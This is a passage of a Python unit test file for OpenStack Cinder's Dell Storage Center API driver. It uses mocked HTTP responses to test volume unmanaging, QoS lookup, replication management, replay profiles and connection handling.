False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{}, {}, {}])
def test_get_unmanaged_volume_size_many_found(self,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.ManageExistingInvalidReference,
self.scapi.get_unmanaged_volume_size,
existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{'configuredSize':
'1.073741924E9 Bytes'}])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'size_to_gb',
return_value=(1, 100))
def test_get_unmanaged_volume_size_bad_size(self,
mock_size_to_gb,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.get_unmanaged_volume_size,
existing)
self.assertTrue(mock_size_to_gb.called)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
def test_unmanage(self,
mock_get_id,
mock_put,
mock_close_connection,
mock_open_connection,
mock_init):
# Same as above only we don't have a volume folder.
scvolume = {'name': 'guid'}
expected_url = 'StorageCenter/ScVolume/100'
newname = 'Unmanaged_' + scvolume['name']
expected_payload = {'Name': newname}
self.scapi.unmanage(scvolume)
self.assertTrue(mock_get_id.called)
mock_put.assert_called_once_with(expected_url, expected_payload, True)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_400)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
def test_unmanage_fail(self,
mock_get_id,
mock_put,
mock_close_connection,
mock_open_connection,
mock_init):
# Same as above only we don't have a volume folder.
scvolume = {'name': 'guid'}
expected_url = 'StorageCenter/ScVolume/100'
newname = 'Unmanaged_' + scvolume['name']
expected_payload = {'Name': newname}
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.unmanage,
scvolume)
self.assertTrue(mock_get_id.called)
mock_put.assert_called_once_with(expected_url, expected_payload, True)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[SCQOS])
# def _find_qos(self, qosnode):
def test__find_qos(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi._find_qos('Cinder QoS')
self.assertDictEqual(self.SCQOS, ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json')
# def _find_qos(self, qosnode):
def test__find_qos_not_found(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# set side effect for posts.
# first empty second returns qosnode
mock_get_json.side_effect = [[], self.SCQOS]
ret = self.scapi._find_qos('Cinder QoS')
self.assertDictEqual(self.SCQOS, ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
# def _find_qos(self, qosnode):
def test__find_qos_find_fail(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi._find_qos,
'Cinder QoS')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[])
# def _find_qos(self, qosnode):
def test__find_qos_create_fail(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
mock_post.side_effect = [self.RESPONSE_200, self.RESPONSE_400]
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi._find_qos,
'Cinder QoS')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SCREPL)
def test_get_screplication(self,
mock_get_json,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi.get_screplication({'instanceId': '1'}, 65495)
self.assertDictEqual(self.SCREPL[0], ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[])
def test_get_screplication_not_found(self,
mock_get_json,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi.get_screplication({'instanceId': '1'}, 65496)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_get_screplication_error(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi.get_screplication({'instanceId': '1'}, 65495)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_screplication',
return_value=SCREPL[0])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
def test_delete_replication(self,
mock_delete,
mock_get_screplication,
mock_close_connection,
mock_open_connection,
mock_init):
destssn = 65495
expected = 'StorageCenter/ScReplication/%s' % (
self.SCREPL[0]['instanceId'])
expected_payload = {'DeleteDestinationVolume': True,
'RecycleDestinationVolume': False,
'DeleteRestorePoint': True}
ret = self.scapi.delete_replication(self.VOLUME, destssn)
mock_delete.assert_any_call(expected, payload=expected_payload,
async=True)
self.assertTrue(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_screplication',
return_value=None)
def test_delete_replication_not_found(self,
mock_get_screplication,
mock_close_connection,
mock_open_connection,
mock_init):
destssn = 65495
ret = self.scapi.delete_replication(self.VOLUME, destssn)
self.assertFalse(ret)
ret = self.scapi.delete_replication(self.VOLUME, destssn)
self.assertFalse(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_screplication',
return_value=SCREPL[0])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_400)
def test_delete_replication_error(self,
mock_delete,
mock_get_screplication,
mock_close_connection,
mock_open_connection,
mock_init):
destssn = 65495
expected = 'StorageCenter/ScReplication/%s' % (
self.SCREPL[0]['instanceId'])
expected_payload = {'DeleteDestinationVolume': True,
'RecycleDestinationVolume': False,
'DeleteRestorePoint': True}
ret = self.scapi.delete_replication(self.VOLUME, destssn)
mock_delete.assert_any_call(expected, payload=expected_payload,
async=True)
self.assertFalse(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_qos',
return_value=SCQOS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_sc')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SCREPL[0])
def test_create_replication(self,
mock_get_json,
mock_post,
mock_find_sc,
mock_find_qos,
mock_close_connection,
mock_open_connection,
mock_init):
# We don't test diskfolder. If one is found we include it. If not
# then we leave it out. Checking for disk folder is tested elsewhere.
ssn = 64702
destssn = 65495
qosnode = 'Cinder QoS'
notes = 'Created by Dell Cinder Driver'
repl_prefix = 'Cinder repl of '
mock_find_sc.side_effect = [destssn, ssn, destssn, ssn, destssn, ssn]
payload = {'DestinationStorageCenter': destssn,
'QosNode': self.SCQOS['instanceId'],
'SourceVolume': self.VOLUME['instanceId'],
'StorageCenter': ssn,
'ReplicateActiveReplay': False,
'Type': 'Asynchronous',
'DestinationVolumeAttributes':
{'CreateSourceVolumeFolderPath': True,
'Notes': notes,
'Name': repl_prefix + self.VOLUME['name']}
}
ret = self.scapi.create_replication(self.VOLUME,
str(destssn),
qosnode,
False,
None,
False)
mock_post.assert_any_call('StorageCenter/ScReplication', payload, True)
self.assertDictEqual(self.SCREPL[0], ret)
payload['Type'] = 'Synchronous'
payload['ReplicateActiveReplay'] = True
payload['SyncMode'] = 'HighAvailability'
ret = self.scapi.create_replication(self.VOLUME,
str(destssn),
qosnode,
True,
None,
False)
mock_post.assert_any_call('StorageCenter/ScReplication', payload, True)
self.assertDictEqual(self.SCREPL[0], ret)
ret = self.scapi.create_replication(self.VOLUME,
str(destssn),
qosnode,
True,
None,
True)
mock_post.assert_any_call('StorageCenter/ScReplication', payload, True)
self.assertDictEqual(self.SCREPL[0], ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_qos',
return_value=SCQOS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_sc')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SCREPL[0])
def test_create_replication_error(self,
mock_get_json,
mock_post,
mock_find_sc,
mock_find_qos,
mock_close_connection,
mock_open_connection,
mock_init):
ssn = 64702
destssn = 65495
qosnode = 'Cinder QoS'
notes = 'Created by Dell Cinder Driver'
repl_prefix = 'Cinder repl of '
mock_find_sc.side_effect = [destssn, ssn, destssn, ssn]
mock_post.side_effect = [self.RESPONSE_400, self.RESPONSE_400,
self.RESPONSE_400, self.RESPONSE_400]
payload = {'DestinationStorageCenter': destssn,
'QosNode': self.SCQOS['instanceId'],
'SourceVolume': self.VOLUME['instanceId'],
'StorageCenter': ssn,
'ReplicateActiveReplay': False,
'Type': 'Asynchronous',
'DestinationVolumeAttributes':
{'CreateSourceVolumeFolderPath': True,
'Notes': notes,
'Name': repl_prefix + self.VOLUME['name']}
}
ret = self.scapi.create_replication(self.VOLUME,
str(destssn),
qosnode,
False,
None,
False)
mock_post.assert_any_call('StorageCenter/ScReplication', payload, True)
self.assertIsNone(ret)
payload['Type'] = 'Synchronous'
payload['ReplicateActiveReplay'] = True
payload['SyncMode'] = 'HighAvailability'
ret = self.scapi.create_replication(self.VOLUME,
str(destssn),
qosnode,
True,
None,
True)
mock_post.assert_any_call('StorageCenter/ScReplication', payload, True)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SCREPL)
def test_find_repl_volume(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi.find_repl_volume('guid', 65495)
self.assertDictEqual(self.SCREPL[0], ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[])
def test_find_repl_volume_empty_list(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi.find_repl_volume('guid', 65495)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[{'instanceId': '1'}, {'instanceId': '2'}])
def test_find_repl_volume_multiple_results(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi.find_repl_volume('guid', 65495)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_find_repl_volume_error(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
ret = self.scapi.find_repl_volume('guid', 65495)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_screplication')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_repl_volume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_volume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'remove_mappings')
def test_break_replication(self,
mock_remove_mappings,
mock_find_volume,
mock_find_repl_volume,
mock_get_screplication,
mock_close_connection,
mock_open_connection,
mock_init):
# Find_volume doesn't actually matter. We do not gate on this.
# Switch it up just to prove that.
mock_find_volume.side_effect = [self.VOLUME, # 1
self.VOLUME, # 2
None, # 3
None] # 4
# Much like find volume we do not gate on this.
mock_get_screplication.side_effect = [self.SCREPL[0], # 1
None, # 2
None, # 3
None] # 4
# This
mock_find_repl_volume.side_effect = [self.VOLUME, # 1
self.VOLUME, # 2
self.VOLUME, # 3
self.VOLUME] # 4
mock_remove_mappings.side_effect = [True, # 1
True,
True, # 2
False,
True, # 3
True,
False] # 4
# Good path.
ret = self.scapi.break_replication('name', None, 65495)
self.assertEqual(self.VOLUME, ret)
# Source found, screpl not found.
ret = self.scapi.break_replication('name', None, 65495)
self.assertEqual(self.VOLUME, ret)
# No source vol good path.
ret = self.scapi.break_replication('name', None, 65495)
self.assertEqual(self.VOLUME, ret)
# fail remove mappings
ret = self.scapi.break_replication('name', None, 65495)
self.assertEqual(self.VOLUME, ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_user_preferences')
def test__find_user_replay_profiles(self,
mock_get_user_preferences,
mock_close_connection,
mock_open_connection,
mock_init):
mock_get_user_preferences.return_value = {}
ret = self.scapi._find_user_replay_profiles()
self.assertEqual([], ret)
mock_get_user_preferences.return_value = {'test': 'test',
'replayProfileList': []}
ret = self.scapi._find_user_replay_profiles()
self.assertEqual([], ret)
mock_get_user_preferences.return_value = {
'test': 'test', 'replayProfileList': [{'instanceId': 'a'},
{'instanceId': 'b'}]}
ret = self.scapi._find_user_replay_profiles()
self.assertEqual(['a', 'b'], ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json')
def test__find_daily_replay_profile(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
mock_post.return_value = self.RESPONSE_200
mock_get_json.return_value = [{'instanceId': 'a'}]
ret = self.scapi._find_daily_replay_profile()
self.assertEqual('a', ret)
mock_get_json.return_value = []
ret = self.scapi._find_daily_replay_profile()
self.assertIsNone(ret)
mock_get_json.return_value = None
ret = self.scapi._find_daily_replay_profile()
self.assertIsNone(ret)
mock_post.return_value = self.RESPONSE_400
ret = self.scapi._find_daily_replay_profile()
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json')
def test__find_replay_profiles(self,
mock_get_json,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# Good run.
rps = 'a,b'
mock_post.return_value = self.RESPONSE_200
mock_get_json.return_value = [{'name': 'a', 'instanceId': 'a'},
{'name': 'b', 'instanceId': 'b'},
{'name': 'c', 'instanceId': 'c'}]
reta, retb = self.scapi._find_replay_profiles(rps)
self.assertEqual(['a', 'b'], reta)
self.assertEqual(['c'], retb)
# Looking for profile that doesn't exist.
rps = 'a,b,d'
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi._find_replay_profiles,
rps)
# Looking for nothing.
rps = ''
reta, retb = self.scapi._find_replay_profiles(rps)
self.assertEqual([], reta)
self.assertEqual([], retb)
# Still Looking for nothing.
rps = None
reta, retb = self.scapi._find_replay_profiles(rps)
self.assertEqual([], reta)
self.assertEqual([], retb)
# Bad call.
rps = 'a,b'
mock_post.return_value = self.RESPONSE_400
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi._find_replay_profiles,
rps)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_replay_profiles')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_user_replay_profiles')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_daily_replay_profile')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_update_volume_profiles')
def test_update_replay_profiles(self,
mock_update_volume_profiles,
mock_find_daily_replay_profile,
mock_find_user_replay_profiles,
mock_find_replay_profiles,
mock_close_connection,
mock_open_connection,
mock_init):
scvol = {}
mock_find_replay_profiles.return_value = (['a', 'b'], ['c'])
mock_update_volume_profiles.side_effect = [
True, True, True,
False,
True, True, False,
True, True, True, True, True,
True, True, True, True,
False]
ret = self.scapi.update_replay_profiles(scvol, 'a,b')
# Two adds and one remove
self.assertEqual(3, mock_update_volume_profiles.call_count)
self.assertTrue(ret)
# Now update fails.
ret = self.scapi.update_replay_profiles(scvol, 'a,b')
# 1 failed update plus 3 from before.
self.assertEqual(4, mock_update_volume_profiles.call_count)
self.assertFalse(ret)
# Fail adding Ids..
ret = self.scapi.update_replay_profiles(scvol, 'a,b')
# 3 more 4 from before.
self.assertEqual(7, mock_update_volume_profiles.call_count)
self.assertFalse(ret)
# User clearing profiles.
mock_find_replay_profiles.return_value = ([], ['a', 'b', 'c'])
mock_find_user_replay_profiles.return_value = ['d', 'u']
ret = self.scapi.update_replay_profiles(scvol, '')
# 3 removes and 2 adds plus 7 from before
self.assertEqual(12, mock_update_volume_profiles.call_count)
self.assertTrue(ret)
# User clearing profiles and no defaults. (Probably not possible.)
mock_find_user_replay_profiles.return_value = []
mock_find_daily_replay_profile.return_value = 'd'
ret = self.scapi.update_replay_profiles(scvol, '')
# 3 removes and 1 add plus 12 from before.
self.assertEqual(16, mock_update_volume_profiles.call_count)
self.assertTrue(ret)
# _find_replay_profiles blows up so we do too.
mock_find_replay_profiles.side_effect = (
exception.VolumeBackendAPIException('aaa'))
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.update_replay_profiles,
scvol,
'a,b')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put')
def test_manage_replay(self,
mock_put,
mock_close_connection,
mock_open_connection,
mock_init):
screplay = {'description': 'notguid',
'instanceId': 1}
payload = {'description': 'guid',
'expireTime': 0}
mock_put.return_value = self.RESPONSE_200
ret = self.scapi.manage_replay(screplay, 'guid')
self.assertTrue(ret)
mock_put.assert_called_once_with('StorageCenter/ScReplay/1', payload,
True)
mock_put.return_value = self.RESPONSE_400
ret = self.scapi.manage_replay(screplay, 'guid')
self.assertFalse(ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put')
def test_unmanage_replay(self,
mock_put,
mock_close_connection,
mock_open_connection,
mock_init):
screplay = {'description': 'guid',
'instanceId': 1}
payload = {'expireTime': 1440}
mock_put.return_value = self.RESPONSE_200
ret = self.scapi.unmanage_replay(screplay)
self.assertTrue(ret)
mock_put.assert_called_once_with('StorageCenter/ScReplay/1', payload,
True)
mock_put.return_value = self.RESPONSE_400
ret = self.scapi.unmanage_replay(screplay)
self.assertFalse(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_replay_list')
def test_find_common_replay(self,
mock_get_replay_list,
mock_close_connection,
mock_open_connection,
mock_init):
dreplays = [{'globalIndex': '11111.113'},
{'globalIndex': '11111.112'},
{'globalIndex': '11111.111'}]
sreplays = [{'globalIndex': '12345.112'},
{'globalIndex': '12345.111'},
{'globalIndex': '11111.112'},
{'globalIndex': '11111.111'}]
xreplays = [{'globalIndex': '12345.112'},
{'globalIndex': '12345.111'}]
mock_get_replay_list.side_effect = [dreplays, sreplays,
dreplays, xreplays]
ret = self.scapi.find_common_replay({'instanceId': '12345.1'},
{'instanceId': '11111.1'})
self.assertEqual({'globalIndex': '11111.112'}, ret)
ret = self.scapi.find_common_replay(None, {'instanceId': '11111.1'})
self.assertIsNone(ret)
ret = self.scapi.find_common_replay({'instanceId': '12345.1'}, None)
self.assertIsNone(ret)
ret = self.scapi.find_common_replay({'instanceId': '12345.1'},
{'instanceId': '11111.1'})
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_qos')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
def test_start_replication(self,
mock_post,
mock_get_json,
mock_find_qos,
mock_close_connection,
mock_open_connection,
mock_init):
svolume = {'name': 'guida', 'instanceId': '12345.101',
'scSerialNumber': 12345}
dvolume = {'name': 'guidb', 'instanceId': '11111.101',
'scSerialNumber': 11111}
mock_post.return_value = self.RESPONSE_200
mock_get_json.return_value = {'instanceId': '12345.201'}
mock_find_qos.return_value = {'instanceId': '12345.1'}
expected = {'QosNode': '12345.1',
'SourceVolume': '12345.101',
'StorageCenter': 12345,
'ReplicateActiveReplay': False,
'Type': 'Asynchronous',
'DestinationVolume': '11111.101',
'DestinationStorageCenter': 11111}
ret = self.scapi.start_replication(svolume, dvolume, 'Asynchronous',
'cinderqos', False)
self.assertEqual(mock_get_json.return_value, ret)
mock_post.assert_called_once_with('StorageCenter/ScReplication',
expected, True)
mock_post.return_value = self.RESPONSE_400
ret = self.scapi.start_replication(svolume, dvolume, 'Asynchronous',
'cinderqos', False)
self.assertIsNone(ret)
mock_post.return_value = self.RESPONSE_200
mock_find_qos.return_value = None
ret = self.scapi.start_replication(svolume, dvolume, 'Asynchronous',
'cinderqos', False)
self.assertIsNone(ret)
mock_find_qos.return_value = {'instanceId': '12345.1'}
ret = self.scapi.start_replication(None, dvolume, 'Asynchronous',
'cinderqos', False)
self.assertIsNone(ret)
ret = self.scapi.start_replication(svolume, None, 'Asynchronous',
'cinderqos', False)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_common_replay')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'create_replay')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'start_replication')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
def test_replicate_to_common(self,
mock_post,
mock_get_json,
mock_start_replication,
mock_create_replay,
mock_find_common_replay,
mock_close_connection,
mock_open_connection,
mock_init):
creplay = {'instanceId': '11111.201'}
svolume = {'name': 'guida'}
dvolume = {'name': 'guidb', 'volumeFolder': {'instanceId': '11111.1'}}
vvolume = {'name': 'guidc'}
mock_find_common_replay.return_value = creplay
mock_post.return_value = self.RESPONSE_200
mock_get_json.return_value = vvolume
mock_create_replay.return_value = {'instanceId': '12345.202'}
mock_start_replication.return_value = {'instanceId': '12345.203'}
# Simple common test.
ret = self.scapi.replicate_to_common(svolume, dvolume, 'cinderqos')
self.assertEqual(mock_start_replication.return_value, ret)
mock_post.assert_called_once_with(
'StorageCenter/ScReplay/11111.201/CreateView',
{'Name': 'fback:guidb',
'Notes': 'Created by Dell Cinder Driver',
'VolumeFolder': '11111.1'},
True)
mock_create_replay.assert_called_once_with(svolume, 'failback', 600)
mock_start_replication.assert_called_once_with(svolume, vvolume,
'Asynchronous',
'cinderqos',
False)
mock_create_replay.return_value = None
# Unable to create a replay.
ret = self.scapi.replicate_to_common(svolume, dvolume, 'cinderqos')
self.assertIsNone(ret)
mock_create_replay.return_value = {'instanceId': '12345.202'}
mock_get_json.return_value = None
# Create view volume fails.
ret = self.scapi.replicate_to_common(svolume, dvolume, 'cinderqos')
self.assertIsNone(ret)
mock_get_json.return_value = vvolume
mock_post.return_value = self.RESPONSE_400
# Post call returns an error.
ret = self.scapi.replicate_to_common(svolume, dvolume, 'cinderqos')
self.assertIsNone(ret)
mock_post.return_value = self.RESPONSE_200
mock_find_common_replay.return_value = None
# No common replay found.
ret = self.scapi.replicate_to_common(svolume, dvolume, 'cinderqos')
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'delete_replication')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'start_replication')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'rename_volume')
def test_flip_replication(self,
mock_rename_volume,
mock_start_replication,
mock_delete_replication,
mock_close_connection,
mock_open_connection,
mock_init):
svolume = {'scSerialNumber': '12345.1'}
dvolume = {'scSerialNumber': '11111.1'}
name = 'guid'
replicationtype = 'Synchronous'
qosnode = 'cinderqos'
activereplay = True
mock_delete_replication.return_value = True
mock_start_replication.return_value = {'instanceId': '11111.101'}
mock_rename_volume.return_value = True
# Good run.
ret = self.scapi.flip_replication(svolume, dvolume, name,
replicationtype, qosnode,
activereplay)
self.assertTrue(ret)
mock_delete_replication.assert_called_once_with(svolume, '11111.1',
False)
mock_start_replication.assert_called_once_with(dvolume, svolume,
replicationtype,
qosnode, activereplay)
mock_rename_volume.assert_any_call(svolume, 'Cinder repl of guid')
mock_rename_volume.assert_any_call(dvolume, 'guid')
mock_rename_volume.return_value = False
# Unable to rename volumes.
ret = self.scapi.flip_replication(svolume, dvolume, name,
replicationtype, qosnode,
activereplay)
self.assertFalse(ret)
mock_rename_volume.return_value = True
mock_start_replication.return_value = None
# Start replication call fails.
ret = self.scapi.flip_replication(svolume, dvolume, name,
replicationtype, qosnode,
activereplay)
self.assertFalse(ret)
mock_delete_replication.return_value = False
mock_start_replication.return_value = {'instanceId': '11111.101'}
# Delete old replication call fails.
ret = self.scapi.flip_replication(svolume, dvolume, name,
replicationtype, qosnode,
activereplay)
self.assertFalse(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get')
def test_replication_progress(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
mock_get.return_value = self.RESPONSE_200
mock_get_json.return_value = {'synced': True,
'amountRemaining': '0 Bytes'}
# Good run
retbool, retnum = self.scapi.replication_progress('11111.101')
self.assertTrue(retbool)
self.assertEqual(0.0, retnum)
# SC replication ID is None.
retbool, retnum = self.scapi.replication_progress(None)
self.assertIsNone(retbool)
self.assertIsNone(retnum)
mock_get.return_value = self.RESPONSE_400
# Get progress call fails.
retbool, retnum = self.scapi.replication_progress('11111.101')
self.assertIsNone(retbool)
self.assertIsNone(retnum)
class DellSCSanAPIConnectionTestCase(test.TestCase):
"""DellSCSanAPIConnectionTestCase
Class to test the Storage Center API connection using Mock.
"""
# Create a Response object that indicates OK
response_ok = models.Response()
response_ok.status_code = 200
response_ok.reason = u'ok'
RESPONSE_200 = response_ok
# Create a Response object with no content
response_nc = models.Response()
response_nc.status_code = 204
response_nc.reason = u'duplicate'
RESPONSE_204 = response_nc
# Create a Response object is a pure error.
response_bad = models.Response()
response_bad.status_code = 400
response_bad.reason = u'bad request'
RESPONSE_400 = response_bad
APIDICT = {u'instanceId': u'0',
u'hostName': u'192.168.0.200',
u'userId': 434226,
u'connectionKey': u'',
u'minApiVersion': u'0.1',
u'webServicesPort': 3033,
u'locale': u'en_US',
u'objectType': u'ApiConnection',
u'secureString': u'',
u'applicationVersion': u'2.0.1',
u'source': u'REST',
u'commandLine': False,
u'application': u'Cinder REST Driver',
u'sessionKey': 1436460614863,
u'provider': u'EnterpriseManager',
u'instanceName': u'ApiConnection',
u'connected': True,
u'userName': u'Admin',
u'useHttps': False,
u'providerVersion': u'15.3.1.186',
u'apiVersion': u'2.2',
u'apiBuild': 199}
def setUp(self):
super(DellSCSanAPIConnectionTestCase, self).setUp()
# Configuration is a mock. A mock is pretty much a blank
# slate. I believe mock's done in setup are not happy time
# mocks. So we just do a few things like driver config here.
self.configuration = mock.Mock()
self.configuration.san_is_local = False
self.configuration.san_ip = "192.168.0.1"
self.configuration.san_login = "admin"
self.configuration.san_password = "mmm"
self.configuration.dell_sc_ssn = 12345
self.configuration.dell_sc_server_folder = 'openstack'
self.configuration.dell_sc_volume_folder = 'openstack'
# Note that we set this to True even though we do not
# test this functionality. This is sent directly to
# the requests calls as the verify parameter and as
# that is a third party library deeply stubbed out is
# not directly testable by this code. Note that in the
# case that this fails the driver fails to even come
# up.
self.configuration.dell_sc_verify_cert = True
self.configuration.dell_sc_api_port = 3033
self.configuration.iscsi_ip_address = '192.168.1.1'
self.configuration.iscsi_port = 3260
self._context = context.get_admin_context()
self.apiversion = '2.0'
# Set up the StorageCenterApi
self.scapi = dell_storagecenter_api.StorageCenterApi(
self.configuration.san_ip,
self.configuration.dell_sc_api_port,
self.configuration.san_login,
self.configuration.san_password,
self.configuration.dell_sc_verify_cert,
self.apiversion)
# Set up the scapi configuration vars
self.scapi.ssn = self.configuration.dell_sc_ssn
self.scapi.sfname = self.configuration.dell_sc_server_folder
self.scapi.vfname = self.configuration.dell_sc_volume_folder
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=APIDICT)
def test_open_connection(self,
mock_get_json,
mock_post):
self.scapi.open_connection()
self.assertTrue(mock_post.called)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_check_version_fail',
return_value=RESPONSE_400)
def test_open_connection_failure(self,
mock_check_version_fail,
mock_post):
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.open_connection)
self.assertTrue(mock_check_version_fail.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_check_version_fail',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=APIDICT)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_open_connection_sc(self,
mock_post,
mock_get_json,
mock_check_version_fail):
self.scapi.open_connection()
self.assertTrue(mock_check_version_fail.called)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_close_connection(self,
mock_post):
self.scapi.close_connection()
self.assertTrue(mock_post.called)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_close_connection_failure(self,
mock_post):
self.scapi.close_connection()
self.assertTrue(mock_post.called)
class DellHttpClientTestCase(test.TestCase):
"""DellSCSanAPIConnectionTestCase
Class to test the Storage Center API connection using Mock.
"""
ASYNCTASK = {"state": "Running",
